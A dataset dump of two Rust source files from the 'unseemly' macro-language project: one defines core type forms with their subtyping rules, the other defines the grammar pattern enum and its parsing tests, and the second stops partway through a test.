repo
stringlengths
6
65
file_url
stringlengths
81
311
file_path
stringlengths
6
227
content
stringlengths
0
32.8k
language
stringclasses
1 value
license
stringclasses
7 values
commit_sha
stringlengths
40
40
retrieved_at
stringdate
2026-01-04 15:31:58
2026-01-04 20:25:31
truncated
bool
2 classes
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_type_forms.rs
src/core_type_forms.rs
// The type theory for Unseemly // is largely swiped from the "Types and Programming Languages" by Pierce. // I've agressively copied the formally-elegant but non-ergonomic theory // whenever I think that the ergonomic way of doing things is just syntax sugar over it. // After all, syntax sugar is the point of Unseemly! // // However, I expect that the core types of a typed macro language will are // part of the user interface (for example, they'd appear in generated module documentation). // Therefore, I used `enum` and `struct` instead of × and +. // There are two similar things (both stored as `Ast`s) we should distinguish! // (1) syntax for types, as written by the user // (2) types themselves, the result of type synthesis // // These things are almost identical, // which is why postive synth_type is usually implemented with `LiteralLike`. // Performing `SynthTy` translates from (1) to (2). Mainly, it resolves type variable references. // // We should also distinguish // (3) ___, (normally also called "types"). The ___ of an expression is a type, // and the ___ of a type is a kind. // // // It is at this point that I am reminded of a passage: // // Now in set theory, which deals with abstractions that we don't use all the time, a // stratification like the theory of types seems acceptable, even if a little strange-but when it // comes to language, an all-pervading part of life, such stratification appears absurd. We // don't think of ourselves as jumping up and down a hierarchy of languages when we speak // about various things. A rather matter-of-fact sentence such as, "In this book, I criticize // the theory of types" would be doubly forbidden in the system we are discussing. Firstly, it // mentions "this book", which should only be mentionable in a metabook-and secondly, it mentions // me-a person whom I should not be allowed to speak of at all! This example points out how silly // the theory of types seems, when you import it into a familiar context. 
The remedy it adopts for // paradoxes-total banishment of self-reference in any form-is a real case of overkill, branding // many perfectly good constructions as meaningless. The adjective "meaningless", by the way, // would have to apply to all discussions of the theory of linguistic types (such as that of this // very paragraph) for they clearly could not occur on any of the levels-neither object language, // nor metalanguage, nor metametalanguage, etc. So the very act of discussing the theory // would be the most blatant possible violation of it! // // — Douglas Hofstadter, Gödel, Escher, Bach: an Eternal Golden Braid use crate::{ ast::*, ast_walk::{ walk, WalkRule::{self, *}, }, form::{simple_form, BiDiWR, Both, Form, Positive}, grammar::{FormPat, SynEnv}, name::*, ty::{synth_type, SynthTy, TyErr}, ty_compare::{Canonicalize, Subtype}, util::assoc::Assoc, walk_mode::NegativeWalkMode, }; use std::rc::Rc; // TODO #3: I think we need to extend `Form` with `synth_kind`... pub fn type_defn(form_name: &str, p: FormPat) -> Rc<Form> { Rc::new(Form { name: n(form_name), grammar: Rc::new(p), type_compare: Both(LiteralLike, LiteralLike), synth_type: Positive(LiteralLike), quasiquote: Both(LiteralLike, LiteralLike), eval: Positive(NotWalked), }) } fn type_defn_complex( form_name: &str, p: FormPat, sy: WalkRule<SynthTy>, tc: BiDiWR<Canonicalize, Subtype>, ) -> Rc<Form> { Rc::new(Form { name: n(form_name), grammar: Rc::new(p), type_compare: tc, synth_type: Positive(sy), quasiquote: Both(LiteralLike, LiteralLike), eval: Positive(NotWalked), }) } thread_local! { // Not needed by the user. // An internal type to keep the compiler from trying to dig into the `Expr` in `Expr<X>`. 
pub static primitive_type : Rc<Form> = Rc::new(Form { name: n("primitive_type"), grammar: Rc::new(form_pat!([(named "name", atom)])), type_compare: Both(LiteralLike, LiteralLike), synth_type: Positive(LiteralLike), quasiquote: Both(LiteralLike, LiteralLike), eval: Positive(NotWalked) }) } pub fn get__primitive_type(called: Name) -> Ast { ast!({primitive_type.with(|p_t| p_t.clone()) ; "name" => (at called)}) } fn is_primitive(form: &Rc<Form>) -> bool { form == &primitive_type.with(|p_t| p_t.clone()) } fn make_core_syn_env_types() -> SynEnv { // Regarding the value/type/kind hierarchy, Benjamin Pierce generously assures us that // "For programming languages ... three levels have proved sufficient." // kinds (TODO #3: actually use these) let _type_kind = simple_form("Type", form_pat!((lit "*"))); let _higher_kind = simple_form( "higher", form_pat!( (delim "k[", "[", [ (star (named "param", (call "kind"))), (lit "->"), (named "res", (call "kind"))])), ); // types let fn_type = type_defn_complex( "fn", form_pat!((delim "[", "[", [ (star (named "param", (call "Type"))), (lit "->"), (named "ret", (call "Type") ) ])), LiteralLike, // synth is normal Both( LiteralLike, cust_rc_box!(move |fn_parts| { let actual = fn_parts.context_elt(); let actual_parts = Subtype::context_match(&fn_parts.this_ast, &actual, fn_parts.env.clone())?; let expd_params = fn_parts.get_rep_term(n("param")); let actl_params = actual_parts.get_rep_leaf_or_panic(n("param")); if expd_params.len() != actl_params.len() { return Err(TyErr::LengthMismatch( actl_params.iter().map(|&a| a.clone()).collect(), expd_params.len(), )); } for (p_expected, p_got) in expd_params.iter().zip(actl_params.iter()) { // Parameters have reversed subtyping: let _: Assoc<Name, Ast> = walk::<Subtype>(*p_got, &fn_parts.with_context(p_expected.clone()))?; } walk::<Subtype>( &fn_parts.get_term(n("ret")), &fn_parts.with_context(actual_parts.get_leaf_or_panic(&n("ret")).clone()), ) }), ), ); let enum_type = type_defn( "enum", 
form_pat!( (delim "{", "{", (star (delim "+[", "[", [(named "name", atom),(star (named "component", (call "Type")))])))), ); let struct_type = type_defn_complex( "struct", form_pat!( (delim "*[", "[", (star [(named "component_name", atom), (lit ":"), (named "component", (call "Type"))]))), LiteralLike, // synth is normal Both( LiteralLike, cust_rc_box!(move |struct_parts| { let actual_struct_parts = Subtype::context_match( &struct_parts.this_ast, struct_parts.context_elt(), struct_parts.env.clone(), )?; for (got_name, got_ty) in actual_struct_parts .get_rep_leaf_or_panic(n("component_name")) .iter() .zip(actual_struct_parts.get_rep_leaf_or_panic(n("component"))) { let mut found = false; for (exp_name, exp_ty) in struct_parts .get_rep_term(n("component_name")) .iter() .zip(struct_parts.get_rep_term(n("component"))) { if got_name.to_name() != exp_name.to_name() { continue; } found = true; let _ = walk::<Subtype>(&got_ty, &struct_parts.with_context(exp_ty.clone()))?; } if !found { return Err(TyErr::NonexistentStructField( got_name.to_name(), struct_parts.this_ast, )); } } Ok(assoc_n!()) }), ), ); let tuple_type = type_defn_complex( "tuple", form_pat!((delim "**[", "[", (star (named "component", (call "Type"))))), LiteralLike, Both(LiteralLike, LiteralLike), ); let forall_type = type_defn_complex( "forall_type", form_pat!([(lit "forall"), (star (named "param", atom)), (lit "."), (named "body", (import [* [forall "param"]], (call "Type")))]), LiteralLike, // synth is normal Both( LiteralLike, cust_rc_box!(move |forall_parts| { match Subtype::context_match( &forall_parts.this_ast, forall_parts.context_elt(), forall_parts.env.clone(), ) { // ∀ X. ⋯ <: ∀ Y. ⋯ ? (so force X=Y) Ok(actual_forall_parts) => { let actl_inner_body = actual_forall_parts.get_leaf_or_panic(&n("body")); walk::<Subtype>( &forall_parts.get_term(n("body")), &forall_parts.with_context(actl_inner_body.clone()), ) } // ∀ X. ⋯ <: ⋯ ? 
(so try to specialize X) Err(_) => { // `import [forall "param"]` handles the specialization, // and we leave the context element alone walk::<Subtype>(&forall_parts.get_term(n("body")), &forall_parts) } } }), ), ); // This behaves slightly differently than the `mu` from Pierce's book, // because we need to support mutual recursion. // In particular, it relies on having a binding for `param` in the environment! // The only thing that `mu` actually does is suppress substitution, // to prevent the attempted generation of an infinite type. let mu_type = type_defn_complex( "mu_type", form_pat!([(lit "mu_type"), (star (named "param", (import [prot "param"], varref))), (lit "."), (named "body", (import [* [prot "param"]], (call "Type")))]), LiteralLike, Both( LiteralLike, cust_rc_box!(move |mu_parts| { let rhs_mu_parts = Subtype::context_match( &mu_parts.this_ast, mu_parts.context_elt(), mu_parts.env.clone(), )?; let rhs_body = rhs_mu_parts.get_leaf_or_panic(&n("body")); let r_params = rhs_mu_parts.get_rep_leaf_or_panic(n("param")); let l_params = mu_parts.get_rep_term(n("param")); if r_params.len() != l_params.len() { return Err(TyErr::LengthMismatch( r_params.iter().cloned().cloned().collect(), l_params.len(), )); } // Apply the Amber rule; assume the `mu`ed names are subtypes to subtype the bodies let mut amber_environment = mu_parts.env.clone(); for (&ee_r, ee_l) in r_params.iter().zip(l_params.iter()) { let (p_r, p_l) = if let (ExtendEnv(r, _), ExtendEnv(l, _)) = (ee_r.c(), ee_l.c()) { (&*r, &*l) } else { icp!("ill-formed mu_type") }; if p_r == p_l // short-circuit if the names are the same... || mu_parts.env.find(&p_r.vr_to_name()) // ...or Amber assumed so already == Some(p_l) { continue; } amber_environment = amber_environment.set(p_r.vr_to_name(), p_l.clone()); } walk::<Subtype>( &mu_parts.get_term(n("body")), &mu_parts .with_environment(amber_environment) .with_context(rhs_body.clone()), ) }), ), ); // TODO: add named repeats. Add type-level numbers! 
// TODO: We probably need kinds, to say that `T` is a tuple // TODO: we'll need dotdotdot inside betas, also, huh? let dotdotdot_type = type_defn( "dotdotdot_type", form_pat!((delim ":::[", "[", [(star (named "driver", varref)), (lit ">>"), (named "body", (call "Type"))])), ); let forall_type_0 = forall_type.clone(); // [Type theory alert!] // Pierce's notion of type application is an expression, not a type; // you just take an expression whose type is a `forall`, and then give it some arguments. // Instead, we will just make the type system unify `forall` types with more specific types. // But sometimes the user wants to write a more specific type, and they use this. // // This is, at the type level, like function application. // We restrict the LHS to being a name, because that's "normal". Should we? let type_apply = type_defn_complex( "type_apply", // TODO: this ad-hoc rule to allow `A<B>` without spaces ... isn't ideal. form_pat!([(named "type_rator", (call "Type")), (call "DefaultSeparator"), (lit_tok (scan "(<)"), "<"), (star (named "arg", (call "Type"))), (call "DefaultSeparator"), (lit_tok (scan "(>)"), ">")]), // TODO: shouldn't it be "args"? cust_rc_box!(move |tapp_parts| { use crate::util::mbe::EnvMBE; let arg_res = tapp_parts.get_rep_res(n("arg"))?; let rator_res = tapp_parts.get_res(n("type_rator"))?; match rator_res.c() { VariableReference(rator_vr) => { // e.g. `X<int, Y>` underneath `mu X. ...` // Rebuild a type_apply, but evaulate its arguments // This kind of thing is necessary because // we wish to avoid aliasing problems at the type level. // In System F, this is avoided by performing capture-avoiding substitution. 
let mut new__tapp_parts = EnvMBE::new_from_leaves( assoc_n!("type_rator" => ast!((vr *rator_vr))), ); let mut args = vec![]; for individual__arg_res in arg_res { args.push(EnvMBE::new_from_leaves( assoc_n!("arg" => individual__arg_res.clone()), )); } new__tapp_parts.add_anon_repeat(args); if let Node(ref f, _, ref exp) = tapp_parts.this_ast.c() { Ok(raw_ast!(Node(/* forall */ f.clone(), new__tapp_parts, exp.clone()))) } else { icp!() } } Node(ref got_f, ref lhs_parts, ref exports) if is_primitive(got_f) => { // Like the above; don't descend into `Expr` let mut new__tapp_parts = EnvMBE::new_from_leaves(assoc_n!("type_rator" => raw_ast!(Node(got_f.clone(), lhs_parts.clone(), exports.clone())))); let mut args = vec![]; for individual__arg_res in arg_res { args.push(EnvMBE::new_from_leaves( assoc_n!("arg" => individual__arg_res.clone()), )); } new__tapp_parts.add_anon_repeat(args); if let Node(f, _, exp) = tapp_parts.this_ast.c() { Ok(raw_ast!(Node(/* forall */ f.clone(), new__tapp_parts, exp.clone()))) } else { icp!() } } Node(ref got_f, ref forall_type__parts, _) if got_f == &forall_type_0 => { // This might ought to be done by a specialized `beta`... let params = forall_type__parts.get_rep_leaf_or_panic(n("param")); if params.len() != arg_res.len() { panic!("[kind error] wrong number of arguments"); } let mut new__ty_env = tapp_parts.env; for (name, actual_type) in params.iter().zip(arg_res) { new__ty_env = new__ty_env.set(name.to_name(), actual_type); } // This bypasses the binding in the type, which is what we want: synth_type( crate::core_forms::strip_ee( forall_type__parts.get_leaf_or_panic(&n("body")), ), new__ty_env, ) } _ => { panic!("[kind error] {} is not a forall.", rator_res); } } }), Both(LiteralLike, LiteralLike), ); assoc_n!("Type" => Rc::new(form_pat![ // Disambiguate `forall T. Foo<T>` so it doesn't get parsed as `(forall T. 
Foo)<T>`: (biased (scope forall_type), (alt (scope fn_type), // TODO: these should turn into `primitive_type`s in the core type environment. // First, we need a really simple core type environment for testing, // and then to change all the `uty!({Type Int :})`s into `uty!(Int)`s // (and `ast!({"Type" "Int" :})`s into `ast!((vr "Int"))`). (scope type_defn("Ident", form_pat!((name_lit "Ident")))), (scope type_defn("Int", form_pat!((name_lit "Int")))), (scope type_defn("Nat", form_pat!((name_lit "Nat")))), (scope type_defn("Float", form_pat!((name_lit "Float")))), (scope type_defn("String", form_pat!((name_lit "String")))), (scope enum_type), (scope struct_type), (scope tuple_type), (scope dotdotdot_type), (scope mu_type), (scope type_apply), varref)) ])) } thread_local! { pub static core_type_forms: SynEnv = make_core_syn_env_types(); } pub fn get_core_types() -> SynEnv { core_type_forms.with(|ctf| ctf.clone()) } pub fn find_type(form_name: &str) -> Rc<Form> { core_type_forms.with(|ctf| crate::core_forms::find_form(ctf, "Type", form_name)) } // TODO #4: this should be extensible for when the syntax environment is extended... // or just automatically have one type per NT. Probably the latter. pub fn nt_to_type(nt: Name) -> Ast { if nt == n("Type") || nt == n("Pat") || nt == n("Expr") { get__primitive_type(nt) } else { icp!("unknown NT {}", nt) } } // TODO #4: make this extensible, too! When the user creates a new NT, // do they need to specify the direction? pub fn nt_is_positive(nt: Name) -> bool { if nt == n("Type") || nt == n("Expr") || nt == n("DefaultReference") { true } else if nt == n("Pat") || nt == n("Atom") || nt == n("Ident") { // TODO: Remove "Ident" entirely. 
// HACK: "Ident" and "DefaultAtom" are just not walked; this should probably be three-armed false } else { icp!("unknown NT {}", nt) } } pub fn less_quoted_ty(t: &Ast, nt: Option<Name>, loc: &Ast) -> Result<Ast, crate::ty::TypeError> { // suppose that this is an expr, and `body` has the type `Expr<String>`: expect_ty_node!( (t ; crate::core_forms::find_core_form("Type", "type_apply") ; loc) tapp_parts; { if let Some(nt) = nt { // Check it if you got it ty_exp!( tapp_parts.get_leaf_or_panic(&n("type_rator")), &get__primitive_type(nt), loc ); } let args = tapp_parts.get_rep_leaf_or_panic(n("arg")); if args.len() != 1 { ty_err!(LengthMismatch(args.into_iter().cloned().collect(), 1) at loc); } // ...returns `String` in that case Ok(args[0].clone()) } ) } pub fn more_quoted_ty(t: &Ast, nt: Name) -> Ast { ast!({"Type" "type_apply" : "type_rator" => (, get__primitive_type(nt)), "arg" => [(, t.clone())]}) } #[test] fn parametric_types() { // Are plain parametric types valid? without_freshening! { // (so we don't have to compute alpha-equivalence) assert_eq!( synth_type(&ast!({"Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] (vr "t"))}), Assoc::new()), Ok(ast!({"Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] (vr "t"))}))); } let ident_ty = ast!( { "Type" "Ident" : }); let nat_ty = ast!( { "Type" "Nat" : }); let para_ty_env = assoc_n!( "unary" => ast!({ "Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (, nat_ty.clone()) ], "ret" => (vr "t") })}), "binary" => ast!({ "Type" "forall_type" : "param" => ["t", "u"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (vr "t"), (vr "u") ], "ret" => (, nat_ty.clone()) })})); let mued_ty_env = assoc_n!("unary" => ast!((vr "unary")), "binary" => ast!((vr "binary"))); // If `unary` is `mu`ed, `unary< ident >` can't be simplified. 
assert_eq!( synth_type( &ast!( { "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ (, ident_ty.clone()) ]}), mued_ty_env.clone() ), Ok(ast!({ "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ (, ident_ty.clone()) ]})) ); // If `unary` is `mu`ed, `unary< [nat -> nat] >` can't be simplified. assert_eq!( synth_type( &ast!( { "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ { "Type" "fn" : "param" => [(, nat_ty.clone())], "ret" => (, nat_ty.clone())} ]}), mued_ty_env.clone() ), Ok(ast!({ "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ { "Type" "fn" : "param" => [(, nat_ty.clone())], "ret" => (, nat_ty.clone())} ]})) ); // Expand the definition of `unary`. assert_eq!( synth_type( &ast!( { "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ (, ident_ty.clone()) ]}), para_ty_env ), Ok(ast!({ "Type" "fn" : "param" => [(, nat_ty.clone() )], "ret" => (, ident_ty.clone())})) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/grammar.rs
src/grammar.rs
#![macro_use] use crate::{ ast::Ast, beta::{Beta, ExportBeta}, form::Form, name::*, runtime::{eval::Value, reify}, util::assoc::Assoc, }; use std::{boxed::Box, clone::Clone, rc::Rc}; custom_derive! { /// `FormPat` defines a pattern in a grammar. Think EBNF, but more extended. /// Most kinds of grammar nodes produce an `Ast` of either `Shape` or `Env`, /// but `Named` and `Scope` are special: /// everything outside of a `Named` (up to a `Scope`, if any) is discarded, /// and `Scope` produces a `Node`, which maps names to what they got. #[derive(Debug, Clone, Reifiable, PartialEq)] pub enum FormPat { /// Matches 0 tokens, produces the `Ast` Anyways(Ast), /// Never matches Impossible, /// Matches actual text! /// The regex must have a single capturing group. /// The optional string is a TextMate syntax category. Scan(Scanner, Option<String>), /// Marks this rule as too commonly-used to be informative; /// prevents display of this rule in parse errors, Common(Rc<FormPat>), /// Matches an atom or varref, but not if it's on the list of reserved words Reserved(Rc<FormPat>, Vec<Name>), /// Matches if the sub-pattern equals the given name Literal(Rc<FormPat>, Name), /// Matches an atom, turns it into a `VariableReference` VarRef(Rc<FormPat>), /// Matches an ordered sequence of patterns. Seq(Vec<Rc<FormPat>>), /// Matches zero or more occurrences of a pattern. Star(Rc<FormPat>), /// Matches one or more occurrences of a pattern. Plus(Rc<FormPat>), /// Matches any of the sub-pattersn. Alt(Vec<Rc<FormPat>>), /// Matches the LHS pattern, or, failing that, the RHS pattern. Biased(Rc<FormPat>, Rc<FormPat>), /// Lookup a nonterminal in the current syntactic environment. Call(Name), /// This is where syntax gets extensible. /// Parses its body in the syntax environment computed from /// the LHS and the current syntax environment. SynImport(Rc<FormPat>, Rc<FormPat>, SyntaxExtension), /// Makes a node and limits the region where names are meaningful. `Beta` defines export. 
Scope(Rc<Form>, ExportBeta), /// Matches a pattern and gives it a name (inside the current `Scope`) Named(Name, Rc<FormPat>), /// Like a `Scope`, but just returns whatever has the given name Pick(Rc<FormPat>, Name), /// FOOTGUN: NameImport(Named(...), ...) is almost always wrong. /// (write Named(NameImport(..., ...)) instead) /// TODO: make this better NameImport(Rc<FormPat>, Beta), /// Like `NameImport`, but affects all phases. NameImportPhaseless(Rc<FormPat>, Beta), /// Quote syntax (the boolean indicates whether it's positive or negative) QuoteDeepen(Rc<FormPat>, bool), /// Escape syntax quotation (by some number of levels) QuoteEscape(Rc<FormPat>, u8) } } impl std::fmt::Display for FormPat { fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { write!(f, "{}", self.mark_up(None)) } } impl FormPat { pub fn mark_up(&self, pos: Option<usize>) -> String { match self { Anyways(ref ast) => { let contents = format!("{}", ast); if contents.len() > 20 { format!("anyways{{⋯}}anyways") } else { format!("anyways{{ {} }}anyways", contents) } } Impossible => format!("impossible"), Scan(ref scanner, _) => format!("/{}/", scanner.0), Common(ref body) => format!("common ({})", body), Reserved(ref body, ref names) => format!( "{} reserving {}", body, names.iter().map(|name| format!("'{}'", name)).collect::<Vec<_>>().join(" ") ), Literal(ref _body, name) => format!("\x1b[34m{}\x1b[0m", name), VarRef(ref body) => format!("vr ({})", body), Seq(ref elts) => { let mut formatted_elts = elts.iter().map(|e| format!("{}", e)).collect::<Vec<_>>(); if let Some(pos) = pos { formatted_elts.insert(pos, "•".to_string()); } format!("[{}]", formatted_elts.join(" ")) } Star(ref body) => format!("{} *", body), Plus(ref body) => format!("{} +", body), Alt(ref elts) => format!( "alt[{}]alt", elts.iter().map(|e| format!("{}", e)).collect::<Vec<_>>().join(" ") ), Biased(ref plan_a, ref plan_b) => format!("{} or{{{}}}or", plan_a, plan_b), // In macro definitions, we need a type 
here, but it's not present in the grammar: Call(ref name) => format!(",{{{}}},", name), SynImport(ref def, ref body, ref _synex) => match pos { None => format!("??syntax extension {} => {} ??", def, body), Some(0) => format!("??syntax extension • {} => {} ??", def, body), Some(1) => format!("??syntax extension {} => • {} ??", def, body), Some(2) => format!("??syntax extension {} => {} • ??", def, body), _ => icp!(), }, Scope(ref form, ref ebeta) => { format!("'{{{}}}' ??? -> .{{??}}. => {:?}", form.grammar, ebeta) } Named(name, ref body) => format!("{} := ({})", name, body), Pick(ref body, name) => format!("pick {} in {}", name, body), NameImport(ref body, ref beta) => format!("{} <-- {:?}", body, beta), NameImportPhaseless(ref body, ref beta) => format!("{} <--?? {:?}", body, beta), QuoteDeepen(ref body, pos) => format!("??deepen?? {} {}", body, pos), QuoteEscape(ref body, levels) => format!("??escape?? {} {}", body, levels), } } // Finds all `Named` nodes, and how many layers of repetition they are underneath. pub fn binders(&self) -> Vec<(Name, u8)> { use tap::tap::Tap; match *self { Named(n, ref body) => vec![(n, 0)].tap_mut(|v| v.append(&mut body.binders())), Seq(ref bodies) | Alt(ref bodies) => { let mut res = vec![]; for body in bodies { res.append(&mut body.binders()); } res } Scope(_, _) | Pick(_, _) => vec![], // No more bindings in this scope Star(ref body) | Plus(ref body) => { body.binders().into_iter().map(|(n, depth)| (n, depth + 1)).collect() } // TODO: since these belong under `Named`, I suspect they ought to return an empty Vec. 
SynImport(ref body, _, _) | NameImport(ref body, _) | NameImportPhaseless(ref body, _) | QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) | Common(ref body) | Reserved(ref body, _) => body.binders(), Biased(ref body_a, ref body_b) => { body_a.binders().tap_mut(|v| v.append(&mut body_b.binders())) } Anyways(_) | Impossible | Literal(_, _) | Scan(_, _) | VarRef(_) | Call(_) => vec![], } } // In this grammar, what kind of thing is `n` (if it's present at all)? pub fn find_named_call(&self, n: Name) -> Option<Name> { match *self { Named(this_n, ref sub) if this_n == n => { // Pass though any number of `Import`s: let mut sub = sub; while let NameImport(ref new_sub, _) = **sub { sub = new_sub; } match **sub { Call(nt) => Some(nt), _ => None, } } Named(_, _) => None, // Otherwise, skip Call(_) => None, // TODO: `Pick` should return a result. Scope(_, _) | Pick(_, _) => None, // Only look in the current scope Anyways(_) | Impossible | Scan(_, _) => None, Star(ref body) | Plus(ref body) | SynImport(ref body, _, _) | NameImport(ref body, _) | NameImportPhaseless(ref body, _) | Literal(ref body, _) | VarRef(ref body) | QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) | Common(ref body) | Reserved(ref body, _) => body.find_named_call(n), Seq(ref bodies) | Alt(ref bodies) => { for body in bodies { let sub_fnc = body.find_named_call(n); if sub_fnc.is_some() { return sub_fnc; } } None } Biased(ref body_a, ref body_b) => { body_a.find_named_call(n).or_else(|| body_b.find_named_call(n)) } } } /// Map regular expressions (as strings) to their TextMate categories. /// This is a loose approximation of the impossible task of syntax-highlighting a `FormPat`. 
pub fn textmate_categories(&self) -> Vec<(String, String)> { match self { Scan(scanner, name) => match name { Some(name) => vec![( format!("{}", scanner.0) .strip_prefix("^") .unwrap() .replace(r#"\/"#, r#"/"#) .to_string(), name.clone(), )], None => vec![], }, Reserved(body, reserved) => { // TODO: modify `Reserved` to allow customization let mut res = body.textmate_categories(); let matcher = reserved .iter() .map(|word| regex::escape(&word.orig_sp())) .collect::<Vec<_>>() .join("|"); res.push((matcher, "keyword".to_string())); res } Literal(_, lit) => { vec![(regex::escape(&lit.orig_sp()), "keyword.operator".to_string())] } Scope(form, _) => form.grammar.textmate_categories(), Anyways(_) | Impossible | Call(_) => vec![], Common(body) | VarRef(body) | Star(body) | Plus(body) | SynImport(_, body, _) | Named(_, body) | Pick(body, _) | NameImport(body, _) | NameImportPhaseless(body, _) | QuoteDeepen(body, _) | QuoteEscape(body, _) => body.textmate_categories(), Biased(lhs, rhs) => { let mut res = lhs.textmate_categories(); res.append(&mut rhs.textmate_categories()); res } Seq(bodies) | Alt(bodies) => { let mut res = vec![]; for body in bodies { res.append(&mut body.textmate_categories()); } res } } } } #[derive(Clone)] pub struct SyntaxExtension( pub Rc<Box<(dyn Fn(crate::earley::ParseContext, Ast) -> crate::earley::ParseContext)>>, ); impl PartialEq for SyntaxExtension { /// pointer equality! (for testing) fn eq(&self, other: &SyntaxExtension) -> bool { self as *const SyntaxExtension == other as *const SyntaxExtension } } // This kind of struct is theoretically possible to add to the `Reifiable!` macro, // but is it worth the complexity? 
impl reify::Reifiable for SyntaxExtension { fn ty_name() -> Name { n("SyntaxExtension") } fn reify(&self) -> Value { reify::reify_2ary_function(self.0.clone()) } fn reflect(v: &Value) -> Self { SyntaxExtension(reify::reflect_2ary_function(v.clone())) } } impl std::fmt::Debug for SyntaxExtension { fn fmt(&self, formatter: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { formatter.write_str("[syntax extension]") } } pub fn new_scan(regex: &str, cat: Option<String>) -> FormPat { Scan(Scanner(regex::Regex::new(&format!("^{}", regex)).unwrap()), cat) } #[derive(Clone)] pub struct Scanner(pub regex::Regex); impl PartialEq for Scanner { fn eq(&self, other: &Scanner) -> bool { self.0.as_str() == other.0.as_str() } } impl reify::Reifiable for Scanner { fn ty_name() -> Name { n("Scanner") } fn reify(&self) -> Value { <String as reify::Reifiable>::reify(&self.0.as_str().to_owned()) } fn reflect(v: &Value) -> Self { Scanner(regex::Regex::new(&<String as reify::Reifiable>::reflect(v)).unwrap()) } } impl std::fmt::Debug for Scanner { fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { write!(f, "[scanner {:?}]", self.0.as_str()) } } pub type SynEnv = Assoc<Name, Rc<FormPat>>; pub use crate::earley::parse; /// Parse `tt` with the grammar `f` in an empty syntactic environment. /// `Call` patterns are errors. 
pub fn parse_top(f: &FormPat, toks: &str) -> Result<Ast, crate::earley::ParseError> { crate::earley::parse_in_syn_env(f, Assoc::new(), toks) } use self::FormPat::*; #[test] fn basic_parsing() { fn mk_lt(s: &str) -> Rc<FormPat> { Rc::new(Literal(Rc::new(new_scan(r"\s*(\S+)", None)), n(s))) } let atom = Rc::new(new_scan(r"\s*(\S+)", None)); assert_eq!(parse_top(&Seq(vec![atom.clone()]), tokens_s!("asdf")).unwrap(), ast_shape!("asdf")); assert_eq!( parse_top( &Seq(vec![atom.clone(), mk_lt("fork"), atom.clone()]), tokens_s!("asdf" "fork" "asdf") ) .unwrap(), ast_shape!("asdf" "fork" "asdf") ); assert_eq!( parse_top( &Seq(vec![atom.clone(), mk_lt("fork"), atom.clone()]), tokens_s!("asdf" "fork" "asdf") ) .unwrap(), ast_shape!("asdf" "fork" "asdf") ); parse_top( &Seq(vec![atom.clone(), mk_lt("fork"), atom.clone()]), tokens_s!("asdf" "knife" "asdf"), ) .unwrap_err(); assert_eq!( parse_top( &Seq(vec![Rc::new(Star(Rc::new(Named(n("c"), mk_lt("*"))))), mk_lt("X")]), tokens_s!("*" "*" "*" "*" "*" "X") ) .unwrap(), ast_shape!({- "c" => ["*", "*", "*", "*", "*"] } "X") ); } #[test] fn alternation() { assert_eq!( parse_top(&form_pat!((alt (lit_aat "A"), (lit_aat "B"))), tokens_s!("A")), Ok(ast!("A")) ); assert_eq!( parse_top(&form_pat!((alt (lit_aat "A"), (lit_aat "B"))), tokens_s!("B")), Ok(ast!("B")) ); assert_eq!( parse_top( &form_pat!((alt (lit_aat "A"), (lit_aat "B"), [(lit_aat "X"), (lit_aat "B")])), tokens_s!("X" "B") ), Ok(ast!(("X" "B"))) ); assert_eq!( parse_top( &form_pat!((alt [(lit_aat "A"), (lit_aat "X")], (lit_aat "B"), [(lit_aat "A"), (lit_aat "B")])), tokens_s!("A" "B") ), Ok(ast!(("A" "B"))) ); assert_eq!( parse_top( &form_pat!((alt (lit_aat "A"), (lit_aat "B"), [(lit_aat "A"), (lit_aat "B")])), tokens_s!("A" "B") ), Ok(ast!(("A" "B"))) ); } #[test] fn advanced_parsing() { use crate::form::simple_form; assert_eq!( parse_top( &form_pat!([(star (named "c", (alt (lit_aat "X"), (lit_aat "O")))), (lit_aat "!")]), tokens_s!("X" "O" "O" "O" "X" "X" "!") ) .unwrap(), 
ast_shape!({- "c" => ["X", "O", "O", "O", "X", "X"]} "!") ); // TODO: this hits the bug where `earley.rs` doesn't like nullables in `Seq` or `Star` assert_eq!( parse_top( &form_pat!( (star (biased [(named "c", (anyways "ttt")), (alt (lit_aat "X"), (lit_aat "O"))], [(named "c", (anyways "igi")), (alt (lit_aat "O"), (lit_aat "H"))]))), tokens_s!("X" "O" "H" "O" "X" "H" "O") ) .unwrap(), ast!({ - "c" => ["ttt", "ttt", "igi", "ttt", "ttt", "igi", "ttt"]}) ); let ttt = simple_form("tictactoe", form_pat!( [(named "c", (alt (lit_aat "X"), (lit_aat "O")))])); let igi = simple_form("igetit", form_pat!( [(named "c", (alt (lit_aat "O"), (lit_aat "H")))])); assert_eq!( parse_top( &form_pat!((star (named "outer", (biased (scope ttt.clone()), (scope igi.clone()))))), tokens_s!("X" "O" "H" "O" "X" "H" "O") ) .unwrap(), ast!({ - "outer" => [{ttt.clone(); ["c" => "X"]}, {ttt.clone(); ["c" => "O"]}, {igi.clone(); ["c" => "H"]}, {ttt.clone(); ["c" => "O"]}, {ttt.clone(); ["c" => "X"]}, {igi; ["c" => "H"]}, {ttt; ["c" => "O"]}]}) ); assert_eq!( parse_top( &form_pat!( (star (named "it", (pick [(named "even", varref_aat), (named "odd", varref_aat)], "odd")))), tokens_s!("A" "B" "C" "D" "E" "F") ) .unwrap(), ast!({- "it" => [(vr "B"), (vr "D"), (vr "F")]}) ); let pair_form = simple_form( "pair", form_pat!([(named 